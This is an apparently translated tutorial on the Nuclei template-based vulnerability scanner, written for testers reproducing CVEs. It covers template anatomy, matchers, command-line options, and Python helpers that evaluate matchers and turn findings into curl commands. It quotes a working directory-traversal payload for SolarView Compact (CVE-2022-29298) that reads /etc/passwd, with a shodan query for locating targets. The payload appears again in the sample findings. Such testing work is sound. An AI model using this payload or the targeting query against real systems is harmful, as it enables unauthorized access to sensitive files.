POC simulation attack weapon - Introduction to nucleus (I)
2022-07-28 02:38:00 【Test development Kevin】

Why Nuclei
Dependency checking finds problems that R&D has to fix, and R&D then asks the tester to reproduce them. That is genuinely hard: you have to understand what the CVE-related bug actually means and then simulate the attack, which is a lot to ask of a tester. After years of evaluating test tools, my instinct was that a tool for this must exist, and after surveying the options I settled on Nuclei. I use Nuclei mainly to simulate CVE-related issues. Note that not every CVE can be simulated with this tool: before using it, check whether the CVE you need to verify already has a Nuclei template; if it does not, you have to write one yourself.
Nuclei basics
Nuclei is a fast vulnerability scanner driven by templates written in a YAML-based syntax. It is written in Go and is highly configurable, extensible and easy to use. Nuclei sends requests to the target according to the chosen template and reports a finding only when the response satisfies the template's matchers, which is why the project describes it as producing zero false positives (in practice the precision is only as good as the template's matchers); it can also scan large numbers of hosts quickly. Nuclei supports scanning over the dns, file, http, headless, network, workflow, ssl, websocket and whois protocols, and its powerful, flexible templates can express all kinds of security checks.
Installing Nuclei
The release binaries are statically built and need no Go toolchain; a Go environment (go1.17 or later) is only required if you build Nuclei from source with `go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest`.
Download the package for your platform from the releases page and install it with the defaults; this article uses the Windows build installed with the defaults.
https://github.com/projectdiscovery/nuclei/releases
Basic use of Nuclei
Principle: Nuclei simulates attack requests according to the contents of a YAML template and then decides from the response whether the target is vulnerable. The built-in templates are the nuclei-templates repository, which Nuclei downloads to $HOME/nuclei-templates by default; CVE templates live under cves/<year>/. The built-in YAML files are laid out as follows (this article only looks at CVE-related vulnerabilities):

Each of those YAML files simulates one attack request. Take CVE-2022-29298.yaml as an example; the file is as follows:

```yaml
id: CVE-2022-29298

info:
  name: SolarView Compact 6.00 - Directory Traversal
  author: ritikchaddha
  severity: high
  description: SolarView Compact ver.6.00 allows attackers to access sensitive files via directory traversal.
  reference:
    - https://www.exploit-db.com/exploits/50950
    - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view
    - https://nvd.nist.gov/vuln/detail/CVE-2022-29298
    - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view?usp=sharing
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-29298
    cwe-id: CWE-22
  metadata:
    shodan-query: http.html:"SolarView Compact"
    verified: "true"
  tags: cve,cve2022,lfi,solarview

requests:
  - method: GET
    path:
      - "{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
```

We can focus on the following fields:
severity: the severity level of this CVE.
tags: the labels this template is registered under; `cve` among them means that running Nuclei with the cve tag will execute this YAML.
requests: the request to simulate. method: GET and path "{{BaseURL}}/..." need no further explanation, as they map directly onto the HTTP protocol's own concepts; {{BaseURL}} is replaced at runtime with the target URL passed on the command line.
matchers: put simply, the checks run against the response. The template above verifies two things:
- a regex matcher (type: regex) checks whether the response body matches the regular expression "root:.*:0:0:", i.e. whether it contains a passwd-style root entry;
- a status matcher (type: status) checks whether the response status code is 200.
The two checks are combined with matchers-condition: and (the default is or), so both must hold before a finding is reported; with or, any page that returns 200 would be reported. I will cover more about matchers in a later article.
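To make the matcher semantics concrete, here is a small matcher evaluator added for this article (it is not Nuclei's code and not the template author's). It expresses the matcher section of CVE-2022-29298.yaml as a Python dict, feeds it two constructed HTTP responses, and shows why `matchers-condition: and` matters: with `or`, an ordinary 200 page is reported as a hit. Only the matcher types used on this page (regex, status, word) plus the `condition` and `negative` keys are implemented; the response dicts are made up for the example.

```python
import re

# Constructed stand-in for the matcher section of CVE-2022-29298.yaml,
# expressed as a Python dict so no YAML library is needed.
TEMPLATE = {
    "matchers-condition": "and",
    "matchers": [
        {"type": "regex", "part": "body", "regex": ["root:.*:0:0:"]},
        {"type": "status", "status": [200]},
    ],
}

# Constructed HTTP responses; "status", "header" and "body" are the parts a
# matcher can look at. A real scanner fills these from the wire.
VULNERABLE_RESPONSE = {
    "status": 200,
    "header": "Content-Type: image/jpeg\r\n",
    "body": "root:x:0:0:root:/root:/bin/sh\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\n",
}
SAFE_RESPONSE = {
    "status": 200,
    "header": "Content-Type: text/html\r\n",
    "body": "<html><body>file not found</body></html>",
}


def evaluate_matcher(matcher, response):
    """Evaluate one matcher against a response dict.

    The values listed inside a matcher are combined with the matcher's own
    'condition' (nuclei default: or); 'negative: true' inverts the result.
    """
    part = matcher.get("part", "body")
    kind = matcher["type"]
    if kind == "status":
        results = [response["status"] == code for code in matcher["status"]]
    elif kind == "regex":
        results = [re.search(p, response[part]) is not None for p in matcher["regex"]]
    elif kind == "word":
        results = [w in response[part] for w in matcher["words"]]
    else:
        raise ValueError(f"unsupported matcher type: {kind}")
    matched = all(results) if matcher.get("condition", "or") == "and" else any(results)
    return (not matched) if matcher.get("negative", False) else matched


def template_matches(template, response):
    """Combine all matchers with matchers-condition (nuclei default: or)."""
    results = [evaluate_matcher(m, response) for m in template["matchers"]]
    if template.get("matchers-condition", "or") == "and":
        return all(results)
    return any(results)


def demo():
    """Compare 'and' with 'or' on the same two responses."""
    or_template = dict(TEMPLATE, **{"matchers-condition": "or"})
    return {
        "and/vulnerable": template_matches(TEMPLATE, VULNERABLE_RESPONSE),
        "and/safe": template_matches(TEMPLATE, SAFE_RESPONSE),
        "or/safe (false positive)": template_matches(or_template, SAFE_RESPONSE),
    }


if __name__ == "__main__":
    for case, hit in demo().items():
        print(f"{case}: {'MATCH' if hit else 'no match'}")
```

The status matcher on its own proves nothing, since the application may answer 200 for every path; it is the body evidence combined with `and` that turns the request into a reliable check. When you write your own template, ask the same question of every matcher: could a non-vulnerable server produce this response?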
For writing http templates, see
https://nuclei.projectdiscovery.io/templating-guide/protocols/http/
For the full template syntax, see
https://github.com/projectdiscovery/nuclei/blob/master/SYNTAX-REFERENCE.md
Note: since v2.5.2, nuclei automatically updates the templates at runtime.
Note: some readers may ask what the following syntax means:

```yaml
- type: status
  status:
    - 200
```

This is plain YAML: `status` is a key whose value is a list (each `- ` item is one element), so the matcher accepts every status code listed, here only 200. Any YAML tutorial covers this.
Common nuclei commands
Nuclei help
nuclei -h
I won't go through the help output here; read it yourself. Other common commands are as follows:
1. Scan the URL https://example.com with the CVE rules (selected via -tags cve), restricted to templates of severity critical or high written by the author geeknik, and write the findings to result.txt:
nuclei -u https://example.com -tags cve -severity critical,high -author geeknik -o result.txt
2. Scan https://example.com, print scan statistics to the console (-stats), restrict to critical and high severity, and write the results to result2.json as JSON lines with the request/response pairs included (-json -irr). Recommended: the JSON report is very detailed and easy to post-process.
nuclei -u https://example.com -stats -severity critical,high -o result2.json -json -irr
3. Run a single template, CVE-2022-1439.yaml, against https://example.com and print every request and response in full (-debug):
nuclei -debug -u https://example.com -t cves/2022/CVE-2022-1439.yaml
Template paths given to -t are resolved relative to the templates directory; forward slashes also work on Windows.
4. nuclei can also scan a list of URLs: put the URLs to scan in a text file, one per line, and pass it with -list:
nuclei -list urls.txt
urls.txt contains:
http://example.com
http://app.example.com
http://test.example.com
http://uat.example.com
5. To output the results in other formats:
# Output as JSON (one object per line)
nuclei -u https://example.com -json
# Export the results as Markdown files into the directory result
nuclei -u https://example.com -me result
For more output options, see the OUTPUT section of nuclei -h, reproduced here:

```text
OUTPUT:
   -o, -output string           output file to write found issues/vulnerabilities
   -sresp, -store-resp          store all request/response passed through nuclei to output directory
   -srd, -store-resp-dir string store all request/response passed through nuclei to custom directory (default "output")
   -silent                      display findings only
   -nc, -no-color               disable output content coloring (ANSI escape codes)
   -json                        write output in JSONL(ines) format
   -irr, -include-rr            include request/response pairs in the JSONL output (for findings only)
   -nm, -no-meta                disable printing result metadata in cli output
   -nts, -no-timestamp          disable printing timestamp in cli output
   -rdb, -report-db string      nuclei reporting database (always use this to persist report data)
   -ms, -matcher-status         display match failure status
   -me, -markdown-export string directory to export results in markdown format
   -se, -sarif-export string    file to export results in SARIF format
```

Customizing the detection template
Nuclei supports custom templates in its YAML syntax, so you can write your own detection template for whatever you need.
For example, define a template mytemplate.yaml with the following contents (a word matcher reports a hit when the response body contains the given string):

```yaml
id: basic-example

info:
  name: Test HTTP Template
  author: pdteam
  severity: info

requests:
  - method: GET
    path:
      - "{{BaseURL}}/"
    matchers:
      - type: word
        words:
          - "This is test matcher text"
```

To run it, execute:
nuclei -u https://example.com -t mytemplate.yaml
Summary of using nuclei
- First confirm the targets to scan (the URLs or HTTP endpoints). This is less convenient than tools such as AppScan or ZAP, which actively crawl the application and probe what they find; Nuclei only requests what you point it at.
- Then decide which rules to run, i.e. which YAML templates (select by tag: cve, panel, lfi, xss and so on). You can use the templates bundled with nuclei or write your own, and to improve scanning efficiency you can also define workflows, which a later article will cover.
- Finally, run the scan from the command line and generate the test report.
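The last step, turning the scan output into something R&D can act on, is where the reproduction problem from the introduction gets solved: with `-json -irr` every finding carries the exact request nuclei sent. The following script is added for this article (it is not part of nuclei) and shows how to post-process that JSONL: count findings by severity, keep only those at or above a chosen level, and rebuild each finding's request as a curl command a developer can paste. The JSONL field names (template-id, info, host, matched-at, request, response) are assumed from nuclei v2's JSON output; the two findings, the host and the timestamps are constructed for the example.

```python
import json
import shlex
from collections import Counter
from urllib.parse import urlsplit

SEVERITY_ORDER = ["unknown", "info", "low", "medium", "high", "critical"]

# Constructed findings in the shape of `nuclei -json -irr` output (one JSON
# object per line). Field names assumed from nuclei v2; values are made up.
_SAMPLE_FINDINGS = [
    {
        "template-id": "CVE-2022-29298",
        "info": {"name": "SolarView Compact 6.00 - Directory Traversal", "severity": "high"},
        "type": "http",
        "host": "https://solarview.example.com",
        "matched-at": "https://solarview.example.com/downloader.php?file=../../../../etc/passwd%00.jpg",
        "request": "GET /downloader.php?file=../../../../etc/passwd%00.jpg HTTP/1.1\r\n"
                   "Host: solarview.example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
        "response": "HTTP/1.1 200 OK\r\nContent-Type: image/jpeg\r\n\r\nroot:x:0:0:root:/root:/bin/sh\n",
        "timestamp": "2022-07-28T02:38:00+08:00",
    },
    {
        "template-id": "tech-detect",
        "info": {"name": "Wappalyzer Technology Detection", "severity": "info"},
        "type": "http",
        "host": "https://solarview.example.com",
        "matched-at": "https://solarview.example.com/",
        "request": "GET / HTTP/1.1\r\nHost: solarview.example.com\r\n\r\n",
        "response": "HTTP/1.1 200 OK\r\nServer: Apache\r\n\r\n<html></html>",
        "timestamp": "2022-07-28T02:38:01+08:00",
    },
]
SAMPLE_JSONL = "\n".join(json.dumps(f) for f in _SAMPLE_FINDINGS) + "\n"


def parse_findings(jsonl_text):
    """One finding per non-empty line; a malformed line is skipped, not fatal."""
    findings = []
    for line in jsonl_text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            findings.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return findings


def severity_counts(findings):
    return dict(Counter(f.get("info", {}).get("severity", "unknown") for f in findings))


def at_least(findings, min_severity):
    """Keep findings whose severity is at or above min_severity."""
    floor = SEVERITY_ORDER.index(min_severity)

    def rank(f):
        sev = f.get("info", {}).get("severity", "unknown")
        return SEVERITY_ORDER.index(sev) if sev in SEVERITY_ORDER else 0

    return [f for f in findings if rank(f) >= floor]


def curl_from_request(raw_request, matched_at):
    """Rebuild the raw HTTP request nuclei sent as a curl command.

    Scheme and host come from matched-at; method, path, headers and body
    come from the raw request. Every argument is shell-quoted.
    """
    head, _, body = raw_request.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    parts = urlsplit(matched_at)
    cmd = ["curl", "-i", "-X", method, f"{parts.scheme}://{parts.netloc}{path}"]
    for h in header_lines:
        if h and not h.lower().startswith("host:"):  # curl derives Host from the URL
            cmd += ["-H", h]
    if body:
        cmd += ["--data-binary", body]
    return " ".join(shlex.quote(c) for c in cmd)


def reproduction_report(findings, min_severity="high"):
    """Plain-text report: one block per finding with evidence and replay command."""
    blocks = []
    for f in at_least(findings, min_severity):
        info = f.get("info", {})
        status_line = f.get("response", "").split("\r\n", 1)[0]
        blocks.append(
            f"[{info.get('severity', 'unknown')}] {f.get('template-id')} - {info.get('name')}\n"
            f"  matched-at: {f.get('matched-at')}\n"
            f"  response:   {status_line}\n"
            f"  reproduce:  {curl_from_request(f['request'], f['matched-at'])}"
        )
    return "\n\n".join(blocks)


if __name__ == "__main__":
    found = parse_findings(SAMPLE_JSONL)
    print("findings by severity:", severity_counts(found))
    print(reproduction_report(found, "high"))
```

Feed a real result2.json produced by the `-json -irr` command above through `parse_findings` and the report gives R&D the template id, the URL that matched, the first line of the response and a one-line replay, which removes the "please reproduce it" round-trip that motivated this article.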